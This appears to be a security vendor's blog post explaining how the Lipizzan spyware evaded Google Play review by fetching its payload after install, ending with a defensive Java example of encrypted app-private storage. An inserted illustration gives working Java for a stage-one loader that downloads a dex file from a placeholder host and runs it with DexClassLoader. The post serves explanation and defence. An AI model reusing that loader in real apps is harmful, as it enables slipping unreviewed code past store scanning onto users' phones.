At the end of last month, Google announced it had blocked a new family of malware that had spread through its Play Store. Dubbed Lipizzan, the malicious code wasn’t spectacular in terms of spying capabilities. The part that has bigger implications for mobile security is how it got through Google’s filters in the first place.

The Lipizzan malware found its way onto Google Play in a rather inventive way, and that route is worth understanding.

According to Google, the Lipizzan spyware could read most of the data stored on an infected device and exfiltrate it to the attackers: email and text messages, location data, voice call recordings, and stored media files. Google reported 20 apps carrying the code in the store and fewer than 100 devices affected in total. These numbers are a drop in the ocean of Google Play's roughly 3 million available apps and billions of users. The scale is not what matters here, though; the delivery method is.

How did this malware get on Google Play?

The problem here is that most people assume there is no malware on Google's official store. The store's defences include static and dynamic analysis of every submitted app (the scanning service long known as Bouncer) and, since 2017, the machine-learning classifiers of Google Play Protect, which flag suspicious patterns across the whole app catalogue faster than a human reviewer could write rules for them. There just shouldn't be harmful apps in that store; it is usually downloading from third-party stores that gets you infected.

To dodge this kind of scanning, Lipizzan used what security researchers call a "classic" move. The code, which Google linked to the Israeli cyberarms company Equus Technologies, split its malicious behaviour into a second-stage component that was never part of the submitted package. Here is how that worked:

  • In the first stage, the apps uploaded to Google Play and installed on the user's device contained no malicious code; they posed as backup, cleaner or similar utilities. Because there was nothing harmful to find in the APK, they passed Google's Bouncer and Play Protect scans.
  • In the second stage, once installed, the apps downloaded a "license verification" file that contained the actual spyware. That payload checked the device it was running on, rooted it using known exploits, and only then started collecting and exfiltrating data.
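The two-stage pattern above, as an added illustration that is not Lipizzan's code and not code from this blog: a stage-one class that looks like a harmless licence check, fetches a file at runtime and executes it with Android's DexClassLoader. The host name, file name and payload class name are placeholders. The point is that a static scan of the uploaded APK sees only an HTTP download and a class loader, while the code that actually runs arrives after the store review is over.

```java
// Added illustration of staged code loading; not Lipizzan's code, not Secure Group's.
// "example.invalid", "license.dex" and "com.example.license.Verifier" are placeholders.
import android.content.Context;
import dalvik.system.DexClassLoader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public final class LicenseCheck {

    // Stage 1 ships only this class: nothing in the submitted APK reads SMS,
    // location or media, so signature- and behaviour-based scans have little to flag.
    public static void run(Context ctx) throws Exception {
        File dir = ctx.getDir("lic", Context.MODE_PRIVATE);
        File payload = new File(dir, "license.dex");

        // Stage 2 is fetched at runtime, after the store review.
        HttpURLConnection conn =
                (HttpURLConnection) new URL("https://example.invalid/license").openConnection();
        try (InputStream in = conn.getInputStream();
             FileOutputStream out = new FileOutputStream(payload)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) {
                out.write(buf, 0, n);
            }
        }

        // DexClassLoader executes code that was never inside the package Google scanned.
        // getCodeCacheDir() needs API 21+; older code used getDir("dex", MODE_PRIVATE).
        DexClassLoader loader = new DexClassLoader(
                payload.getPath(),
                ctx.getCodeCacheDir().getPath(),
                null,
                ctx.getClassLoader());
        Class<?> verifier = loader.loadClass("com.example.license.Verifier");
        verifier.getMethod("verify", Context.class).invoke(null, ctx);
    }
}
```

For triage, the indicators are exactly the ones this skeleton exposes: a reference to dalvik.system.DexClassLoader (or PathClassLoader, or in-memory loading on newer Android versions) together with a network fetch that writes a file into app-private storage. None of them is malicious on its own, which is why a scanner cannot simply reject every app that uses them.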

Should you be worried about Lipizzan?

To their credit, Google detected the malware quickly enough, removed the apps from the store and used Play Protect to remove them from the affected devices. So, if you are worried about this particular strain of malware, you needn't be. The worrisome part is that the whole story shows official app stores, despite companies' best security efforts, are still susceptible to infiltration by malicious apps.

This only goes to reaffirm our view that secure mobile communication solutions should take into account the following:

  • Google Services, including the app store, are not for those concerned about privacy and security. If you have sensitive information on your device, you should close as many access points to it as possible. This is why for Secure Phone we have resorted to disabling Internet browsing and Google Services altogether.
  • You can't count on external protection against malware; new breeds of it will eventually find cracks in any security setup. Because of that, you have to make sure that even if malicious code does land on the device, it cannot reach the data stored on it.

To that end, we have modified the Android Content Provider mechanism so that each app can access only its own storage. We have also designed each app to keep its data only within itself, in encrypted form. For example, a picture sent to your phone via Secure Chat is stored only inside that app. Since the app's storage is also encrypted, other software on the device, malware included, cannot read that picture without first breaking out of Android's per-app sandbox.
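One way to implement the two properties described above on stock Android, as an added example that is not Secure Group's code: keep files in the app's private directory (MODE_PRIVATE, readable only by the app's own Linux UID), encrypt them with an AES-GCM key that lives in the Android Keystore so the key material never sits in the app's files, and declare any content provider with android:exported="false" so no other app can query it. The key alias and file names are assumptions.

```java
// Added example of app-private encrypted storage; not Secure Group's code.
// In AndroidManifest.xml the matching provider is declared non-exported, e.g.
//   <provider android:name=".MediaProvider" android:authorities="com.example.media"
//             android:exported="false" />
// so other packages cannot query it at all. KEY_ALIAS and file names are assumed.
import android.content.Context;
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.security.KeyStore;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

public final class PrivateEncryptedStore {
    private static final String KEYSTORE = "AndroidKeyStore";
    private static final String KEY_ALIAS = "app_storage_key";   // assumed alias
    private static final int IV_LEN = 12;                       // GCM nonce, bytes
    private static final int TAG_BITS = 128;                    // GCM auth tag

    private final Context ctx;

    public PrivateEncryptedStore(Context ctx) {
        this.ctx = ctx.getApplicationContext();
    }

    // Returns the app's storage key, generating it inside the Keystore on first use.
    // The key is bound to this app's UID and cannot be exported, so an attacker who
    // copies the encrypted files gets nothing without also running as this app.
    private static SecretKey key() throws Exception {
        KeyStore ks = KeyStore.getInstance(KEYSTORE);
        ks.load(null);
        KeyStore.Entry e = ks.getEntry(KEY_ALIAS, null);
        if (e instanceof KeyStore.SecretKeyEntry) {
            return ((KeyStore.SecretKeyEntry) e).getSecretKey();
        }
        KeyGenerator kg = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, KEYSTORE);
        kg.init(new KeyGenParameterSpec.Builder(KEY_ALIAS,
                KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
                .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
                .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
                .setKeySize(256)
                .build());
        return kg.generateKey();
    }

    // Encrypts and writes a blob (e.g. a received picture) to the app-private files dir.
    public void write(String name, byte[] plaintext) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, key());   // Keystore picks a fresh random IV per call
        byte[] iv = c.getIV();
        byte[] ct = c.doFinal(plaintext);     // ciphertext followed by the GCM tag
        // MODE_PRIVATE: /data/data/<pkg>/files/<name>, mode 0600, owned by this app's UID.
        try (OutputStream out = ctx.openFileOutput(name, Context.MODE_PRIVATE)) {
            out.write(iv);
            out.write(ct);
        }
    }

    // Reads and decrypts a blob; throws AEADBadTagException if it was tampered with.
    public byte[] read(String name) throws Exception {
        byte[] blob;
        try (InputStream in = ctx.openFileInput(name)) {
            ByteArrayOutputStream buf = new ByteArrayOutputStream();
            byte[] tmp = new byte[8192];
            int n;
            while ((n = in.read(tmp)) != -1) {
                buf.write(tmp, 0, n);
            }
            blob = buf.toByteArray();
        }
        byte[] iv = Arrays.copyOfRange(blob, 0, IV_LEN);
        byte[] ct = Arrays.copyOfRange(blob, IV_LEN, blob.length);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, key(), new GCMParameterSpec(TAG_BITS, iv));
        return c.doFinal(ct);
    }
}
```

The caveat a practitioner will want: the UID boundary is what stops other apps, and a payload that roots the device, as Lipizzan's second stage did, can run as any UID it likes. Hardware-backed Keystore keys still cannot be extracted from a rooted phone, but they can be used by a process impersonating the app, so this layer limits what an unprivileged infection can reach rather than making data on a fully compromised device unreadable.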